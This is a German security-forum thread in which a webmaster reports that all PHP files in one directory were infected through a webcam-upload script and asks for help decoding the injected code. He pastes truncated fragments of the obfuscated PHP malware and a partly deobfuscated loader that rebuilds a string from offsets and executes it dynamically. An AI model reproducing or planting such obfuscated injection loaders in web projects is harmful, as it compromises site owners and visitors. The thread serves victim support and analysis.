Zurück   Trojaner-Board > Malware entfernen > Plagegeister aller Art und deren Bekämpfung

Plagegeister aller Art und deren Bekämpfung: Alle php Seiten einer Website verändert und mit Schadcode ergänzt

Windows 7 Wenn Du nicht sicher bist, ob Du dir Malware oder Trojaner eingefangen hast, erstelle hier ein Thema. Ein Experte wird sich mit weiteren Anweisungen melden und Dir helfen die Malware zu entfernen oder Unerwünschte Software zu deinstallieren bzw. zu löschen. Bitte schildere dein Problem so genau wie möglich. Sollte es ein Trojaner oder Viren Problem sein wird ein Experte Dir bei der Beseitigug der Infektion helfen.

Antwort
Alt 08.02.2016, 13:06   #1
RLO
 
Alle php Seiten einer Website verändert und mit Schadcode ergänzt - Standard

Alle php Seiten einer Website verändert und mit Schadcode ergänzt



Hallo,

auf meinem Webserver wurden in einem Verzeichnis alle php Dateien mit einenm Schadcode versehen.
Ich konnte dank aktuellen Backups alles wieder zurücksetzen.
Den Übeltäter habe ich auch gefunden über den das kam.
Ein kleines Script das Bilder einer Überwachungskamera auf den Server läd.

Problem ist zwar beseitigt, aber ich würde gerne wissen ob einem von euch schon mal solch ein Code bzw. dieser Code untergejubelt wurde.

Anfang und Ende des Codes, anteilig werden hier etwa nur 10% gezeigt.
PHP-Code:
<?php $kmodjxro '/    x24)##-!#~<#/%    x24-p%)54l}    x27;%!<*#}_;#)323ldfid>}&r%:-t%)3of:opjudovg<~    x24<!%o:!>!    x242178}527:**<(<!fwbm)%tjw)#    x24#-!#]y38#-!%w:**<")));$lpjkgoa = $yboA>2b%!<*qp%-.....................................$dbewedjq = $cghrtg("",fiddca($cadtjv,$kmodjxro,$bdnpcxffu)); $cghrtg=$kmodjxro; $dbewedjq(""); $dbewedjq=(459-338); $kmodjxro=$dbewedjq-1; ?>
Und mich würde interessieren ob es ein Tool gibt um den Code zu entschlüsseln oder von euch jemand solch einen Code entschlüsseln kann.

Für eure Tipps und Antwort sage ich schonmal danke.

Geändert von RLO (08.02.2016 um 13:13 Uhr) Grund: Schreibfehler behoben

Alt 08.02.2016, 13:12   #2
cosinus
/// Winkelfunktion
/// TB-Süch-Tiger™
 
Alle php Seiten einer Website verändert und mit Schadcode ergänzt - Standard

Alle php Seiten einer Website verändert und mit Schadcode ergänzt



Das sieht nach PHP-Obfuscation aus => PHP Code Verschlüsselung (PHP Obfuscator) ? PHP lernen
__________________

__________________

Alt 08.02.2016, 13:20   #3
RLO
 
Alle php Seiten einer Website verändert und mit Schadcode ergänzt - Standard

Alle php Seiten einer Website verändert und mit Schadcode ergänzt



Zitat:
Zitat von cosinus Beitrag anzeigen
Das sieht nach PHP-Obfuscation aus => PHP Code Verschlüsselung (PHP Obfuscator) ? PHP lernen
Danke dir für den Tipp, allerdings wird der COde dann verschlüsselt.
Gibt es eine Möglichkeit den COde zu entschlüsseln?
__________________

Alt 08.02.2016, 13:33   #4
cosinus
/// Winkelfunktion
/// TB-Süch-Tiger™
 
Alle php Seiten einer Website verändert und mit Schadcode ergänzt - Standard

Alle php Seiten einer Website verändert und mit Schadcode ergänzt



Dann musst du mal nach einem deobfuscator googlen
__________________
Logfiles bitte immer in CODE-Tags posten

Alt 08.02.2016, 14:06   #5
RLO
 
Alle php Seiten einer Website verändert und mit Schadcode ergänzt - Standard

Alle php Seiten einer Website verändert und mit Schadcode ergänzt



Zitat:
Zitat von cosinus Beitrag anzeigen
Dann musst du mal nach einem deobfuscator googlen
Das habe ich bereits gemacht und es kam auch was dabei heraus nur kann ich damit nichts anfangen.

PHP-Code:
<?php $kmodjxro '/    x24)##-!#~<#/%    x24-p%)54l}    x27;%!<*#}_;#)323ldfid>}&r%:-t%)3of:opjudovg<~    x24<!%o:!>!    x242178}527:**<(<!fwbm)%tjw)#    x24#-!#]y38#-!%w:**<")));$lpjkgoa = $yboA>2b%!<*qp%-*.%)...................................
if (!function_exists('
fiddca')) {
    function fiddca($sbwntnawb, $ccqjnmhdfz, $jyoivhqcf) {
        $oshyjjsy = NULL;
        for ($itibwji = 0;$itibwji < (sizeof($sbwntnawb) / 2);$itibwji++) {
            $oshyjjsy.= substr($ccqjnmhdfz, $sbwntnawb[($itibwji * 2) ], $sbwntnawb[($itibwji * 2) + (5 - 4) ]);
        }
        return $jyoivhqcf(chr((33 - 24)), chr((430 - 338)), $oshyjjsy);
    };
}
$cadtjv = explode(chr((200 - 156)), '
5649,51,466,24,4923,21,4659,67,3131,50,2246,61,4596,63,518,61,5413,39,2349,44,4286,60,308,44,2119,33,4528,68,3397,44,1038,55,4371,70,1611,27,4068,40,2393,64,1911,21,2001,36,3473,68,2989,48,3913,57,4346,25,847,62,4441,67,5768,69,2836,66,352,54,4882,41,1679,67,5452,66,2722,49,5624,25,2152,46,4253,33,5577,47,909,53,1793,24,1965,36,1351,45,5004,35,1010,28,5039,37,2037...............................................42,65,3265,37,1446,64,5245,62,3566,32,2677,45,807,40,5383,30,3203,62,99,59,1932,33');
$dbewedjq = $cghrtg("", fiddca($cadtjv, $kmodjxro, $bdnpcxffu));
$cghrtg = $kmodjxro;
$dbewedjq("");
$dbewedjq = (459 - 338);
$kmodjxro = $dbewedjq - 1; ?>


Alt 09.02.2016, 14:41   #6
cosinus
/// Winkelfunktion
/// TB-Süch-Tiger™
 
Alle php Seiten einer Website verändert und mit Schadcode ergänzt - Standard

Alle php Seiten einer Website verändert und mit Schadcode ergänzt



Wir löschen nix, aber ich verweise gerne auf dein crossposting => Alle php Seiten einer Website verändert und mit Schadcode ergänzt

__________________
--> Alle php Seiten einer Website verändert und mit Schadcode ergänzt

Antwort

Themen zu Alle php Seiten einer Website verändert und mit Schadcode ergänzt
aktuelle, aktuellen, backups, beseitigt, bilder, dateien, entschlüsseln, gefunde, kleines, konnte, schadcode, schlüssel, schlüsseln, schonmal, script, seite, seiten, tipps, tool, verzeichnis, verändert, webserver, website, wissen, würde




Ähnliche Themen: Alle php Seiten einer Website verändert und mit Schadcode ergänzt


  1. FRST logs nach Google-Blockierung einer Website
    Log-Analyse und Auswertung - 09.06.2014 (5)
  2. Startseite verändert, falsche Seiten öffnen sich 22find...
    Log-Analyse und Auswertung - 24.04.2014 (5)
  3. Benachrichtigungen von MBAM über gestoppte Zugänge zu einer potenziell gefährlichen Website (127.0.0.1)
    Plagegeister aller Art und deren Bekämpfung - 01.08.2013 (12)
  4. Google redirect Virus nur bei einer Website möglich?
    Plagegeister aller Art und deren Bekämpfung - 26.06.2013 (5)
  5. Google ergänzt Transparenzreport um FBI-Anfragen
    Nachrichten - 06.03.2013 (0)
  6. JS:agent-AXQ [Trj] beim Aufrufen von einer Website
    Plagegeister aller Art und deren Bekämpfung - 28.01.2013 (20)
  7. Entfernung >Schadcode: >c3284d....online-alles.net....< aus HTML Seiten
    Plagegeister aller Art und deren Bekämpfung - 25.11.2012 (5)
  8. (2x) Zugang zu einer potentiell gefährlichen Website gestoppt
    Mülltonne - 09.10.2012 (1)
  9. Allgemeine Frage: Sicherheit einer selber betriebenen Website
    Diskussionsforum - 07.10.2012 (2)
  10. (2x) Meldung: Zugang zu einer gefährlichen Website gestoppt
    Mülltonne - 19.09.2012 (4)
  11. Alle Desktopdateien von Trojaner verändert/umbenannt
    Plagegeister aller Art und deren Bekämpfung - 05.07.2012 (3)
  12. Youtube Seiten-Ladefehler alle anderen Seiten funktionieren
    Log-Analyse und Auswertung - 09.06.2011 (12)
  13. Was ist das genau? Javascript in einer Website, öffnet Acrobat Reader
    Plagegeister aller Art und deren Bekämpfung - 16.10.2009 (10)
  14. restart beim besuchen einer website
    Plagegeister aller Art und deren Bekämpfung - 05.10.2007 (2)
  15. Frage zu einer website mit Java ( Virus? )
    Plagegeister aller Art und deren Bekämpfung - 04.10.2007 (4)
  16. Frage zu einer website mit Java ( Virus? )
    Antiviren-, Firewall- und andere Schutzprogramme - 04.10.2007 (1)
  17. Startseite verändert, popups und Seiten öffnen sich willkürlich
    Plagegeister aller Art und deren Bekämpfung - 12.12.2004 (12)

Zum Thema Alle php Seiten einer Website verändert und mit Schadcode ergänzt - Hallo, auf meinem Webserver wurden in einem Verzeichnis alle php Dateien mit einenm Schadcode versehen. Ich konnte dank aktuellen Backups alles wieder zurücksetzen. Den Übeltäter habe ich auch gefunden über - Alle php Seiten einer Website verändert und mit Schadcode ergänzt...
Archiv
Du betrachtest: Alle php Seiten einer Website verändert und mit Schadcode ergänzt auf Trojaner-Board

Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.